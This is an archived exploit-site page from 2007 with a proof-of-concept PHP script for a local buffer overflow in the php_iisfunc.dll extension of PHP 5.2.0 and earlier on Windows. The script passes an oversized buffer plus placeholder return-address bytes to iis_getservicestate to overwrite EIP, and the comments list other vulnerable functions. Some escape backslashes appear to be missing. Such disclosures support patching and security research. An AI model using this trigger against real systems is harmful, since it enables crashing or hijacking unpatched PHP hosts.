PHP <= 5.2.0 (php_iisfunc.dll) Local Buffer Overflow PoC (win32)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP <= 5.2.0 (php_iisfunc.dll) Local Buffer Overflow PoC (win32)
# Published : 2007-08-27
# Author : boecke
# Previous Title : LeadTools ISIS Control (ltisi14E.ocx v.14.5.0.44) Remote DoS Exploit
# Next Title : Thomson SIP phone ST 2030 Remote Denial of Service Exploit

<?php
// ==================================================================================
//
//  php_iisfunc.dll PHP <= 5.2.0 (win32) Buffer Overflow PoC
//
//      Discovery: boecke <boecke@herzeleid.net>
//      Risk: Local Buffer Overflow (Medium - High Risk)
//      Notes: Various other functions are exploitable, all of which convert the
//      string argument(s) to unicode.
//
//      extern "C" IISFUNC_API int fnStartService(LPCTSTR ServiceId);
//      extern "C" IISFUNC_API int fnGetServiceState(LPCTSTR ServiceId);
//      extern "C" IISFUNC_API int fnStopService(LPCTSTR ServiceId);
//
//      "Sangre, sonando, de rabia naci.. Who do you trust?"
//       - Cygnus, Vismund Cygnus: Sarcophagi
//
// ==================================================================================

if ( !extension_loaded( "iisfunc" ) )
{
       die( "Extension not loaded.n" );
}

$buf_unicode = str_repeat( "A", 256 );
$eip_unicode = "x41x41";

iis_getservicestate( $buf_unicode . $eip_unicode );

?>

# www.Syue.com [2007-08-27]